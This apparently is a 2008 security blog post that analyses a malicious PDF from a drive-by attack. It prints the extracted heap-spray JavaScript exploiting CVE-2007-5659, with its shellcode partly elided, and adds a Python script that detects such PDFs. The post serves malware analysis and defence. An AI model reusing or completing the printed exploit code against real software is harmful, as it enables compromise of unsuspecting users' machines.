Malicious PDFs

Lately, malicious PDFs are becoming more popular. They generally abuse the JavaScript functionality that Adobe added to the PDF specification. Luckily, it is not too difficult to analyze these files, since, as we will see, they use pretty much the same techniques that are used in malicious JavaScript code. I'll use as an example the us.pdf file, which was used in a drive-by exploit attack hosted on 78.157.142.122.

PDFs are generally compressed, so the first step is to uncompress the file. To do this, I generally use the nice pdftk tool:

pdftk us.pdf output us.clear.pdf uncompress

Now, if you open us.clear.pdf, the JavaScript code is nicely readable inside one of the objects defined by the document:

function re(count,what) {
  var v = "";
  while (--count >= 0) v += what;
  return v;
} 
function start() {
var sc = unescape(
  "%u9090%u9090%u9090%u9090%ueb90%u5e1a%u5b56%u068a" +
  "%u303c%u1674%ue0c0%u4604%u268a%ue480%u020f%u88c4" +
  "%u4303%ueb46%ue8e9%uffe1%uffff%u585e%u5c51%u5050" +
  ...
  "%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
  "%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
  "%u9090%u9090%u9090%u9090%u9090");
if (app.viewerVersion >= 7.0) {
  plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + 
    unescape("%u0b0b%u0028%u0aeb%u0aeb") + 
    unescape("%u9090%u9090") + 
    re(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + 
    sc + 
    re(1256,unescape("%u4141%u4141"));
} 
else 
{
  ef6 =  unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
  plin = re(80,unescape("%u9090%u9090")) + 
    sc + 
    re(80,unescape("%u9090%u9090"))+ 
    unescape("%ue7e9%ufff9")+
    unescape("%uffff%uffff") + 
    unescape("%uf6eb%uf4eb") + 
    unescape("%uf2eb%uf1eb");
  while ((plin.length % 8) != 0)
    plin = unescape("%u4141") + plin;
  plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
  this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}
var shaft = app.setTimeOut("start()",2000);

The code exploits a vulnerability in the collectEmailInfo method of the Collab object (CVE-2007-5659). The shellcode used in the attack downloads an executable file from the same site. Anubis has some interesting details on the behavior of this executable.
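The analysis above boils down to three mechanical steps once the file is uncompressed: find the objects that carry a /JavaScript action, decode the unescape("%u...") literals into the bytes they lay out in memory, and look for the tell-tale heap-spray shape (a long 0x90 NOP sled, a re()-style repeat helper with a large count, and calls into risky Acrobat APIs such as Collab.collectEmailInfo). The following Python script is an added example that is not part of the original post; it runs over a small constructed PDF fragment (not the real us.pdf) whose shellcode is replaced by a short NOP sled, and it resolves both inline /JS strings and /JS n 0 R stream references, which generalises slightly beyond the single file discussed here. The object names, regexes and the SUSPICIOUS_APIS list are the example's own assumptions.

```python
import re
from typing import Dict

# Constructed sample (not the real us.pdf): an already uncompressed PDF whose
# OpenAction runs a JavaScript stream shaped like the one discussed above.
# The real shellcode is replaced by a short NOP sled; /Length is omitted
# because this parser does not rely on it.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
3 0 obj
<< /S /JavaScript /JS 4 0 R >>
endobj
4 0 obj
<< >>
stream
function re(count,what){var v="";while(--count>=0)v+=what;return v;}
var sc = unescape("%u9090%u9090%u9090%u9090%ueb90%u5e1a");
var plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + sc;
if (app.viewerVersion >= 6.0)
  this.collabStore = Collab.collectEmailInfo({subj: "", msg: plin});
var shaft = app.setTimeOut("start()",2000);
endstream
endobj
trailer
<< /Root 1 0 R >>
"""

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
JS_REF_RE = re.compile(rb"/JS\s+(\d+)\s+\d+\s+R")
JS_INLINE_RE = re.compile(rb"/JS\s*\((.*?)\)", re.S)
UNESCAPE_RE = re.compile(r'unescape\(\s*"([^"]*)"\s*\)')
SPRAY_RE = re.compile(r"\bre\(\s*(\d+)\s*,")          # re(<count>, ...) repeat helper
TOKEN_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|(.)", re.S)
# Acrobat JavaScript APIs seen in the sample above (assumed list; extend it).
SUSPICIOUS_APIS = ["Collab.collectEmailInfo", "app.setTimeOut", "app.viewerVersion"]


def parse_objects(pdf: bytes) -> Dict[int, bytes]:
    """Map object number -> raw object body of an uncompressed PDF."""
    return {int(num.decode()): body for num, body in OBJ_RE.findall(pdf)}


def extract_javascript(pdf: bytes) -> Dict[int, str]:
    """Return {object number: JavaScript source} for every JavaScript action.

    Handles an inline string (/JS (code)) and an indirect reference
    (/JS n 0 R) to a stream object holding the code.
    """
    objects = parse_objects(pdf)
    found: Dict[int, str] = {}
    for num, body in objects.items():
        if b"/JavaScript" not in body and b"/JS" not in body:
            continue
        inline = JS_INLINE_RE.search(body)
        ref = JS_REF_RE.search(body)
        if inline:
            found[num] = inline.group(1).decode("latin-1")
        elif ref:
            target = objects.get(int(ref.group(1).decode()), b"")
            stream = STREAM_RE.search(target)
            if stream:
                found[num] = stream.group(1).decode("latin-1")
    return found


def decode_unescape(literal: str) -> bytes:
    """Decode a JavaScript unescape() literal to the bytes it builds in memory.

    %uXXXX is a UTF-16 code unit stored little-endian by the spray
    (so "%ueb90" becomes bytes 0x90 0xeb); %XX is a single byte.
    """
    out = bytearray()
    for m in TOKEN_RE.finditer(literal):
        if m.group(1):
            out += int(m.group(1), 16).to_bytes(2, "little")
        elif m.group(2):
            out.append(int(m.group(2), 16))
        else:
            out += m.group(3).encode("latin-1", "replace")
    return bytes(out)


def longest_nop_run(data: bytes) -> int:
    """Length of the longest run of 0x90 bytes (a classic NOP sled)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == 0x90 else 0
        best = max(best, cur)
    return best


def analyze_js(js: str) -> dict:
    """Summarise the heap-spray indicators found in one script."""
    decoded = [decode_unescape(lit) for lit in UNESCAPE_RE.findall(js)]
    return {
        "unescape_literals": len(decoded),
        "decoded_bytes": sum(len(d) for d in decoded),
        "longest_nop_run": max((longest_nop_run(d) for d in decoded), default=0),
        "max_spray_count": max((int(n) for n in SPRAY_RE.findall(js)), default=0),
        "apis": [api for api in SUSPICIOUS_APIS if api in js],
    }


def scan_pdf(pdf: bytes) -> Dict[int, dict]:
    """Report per JavaScript-carrying object; an empty dict means no JS found."""
    return {num: analyze_js(js) for num, js in extract_javascript(pdf).items()}


if __name__ == "__main__":
    for obj, report in scan_pdf(SAMPLE_PDF).items():
        print(f"object {obj}: {report}")
```

Run it on the output of the pdftk step (read the uncompressed file as bytes and pass it to scan_pdf) and triage on the combination of indicators rather than any single one: a large repeat count plus a NOP run plus a Collab or app call is the shape of the sample above, whereas a single short unescape literal in a form-validation script is ordinary.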

Another interesting thing to note is that PDF files contain quite a few features and behaviors that may surprise attackers and catch them off guard. Make sure to read Didier Stevens' post on how he used the incremental updates feature to reconstruct how the malicious file was created.


  1. David December 2, 2008

    I think I received one of these! I am investigating!

  2. Ziare January 25, 2009

    Wow... I never thought that PDFs could be malicious. Is there any document, file or whatever that can be untouchable?
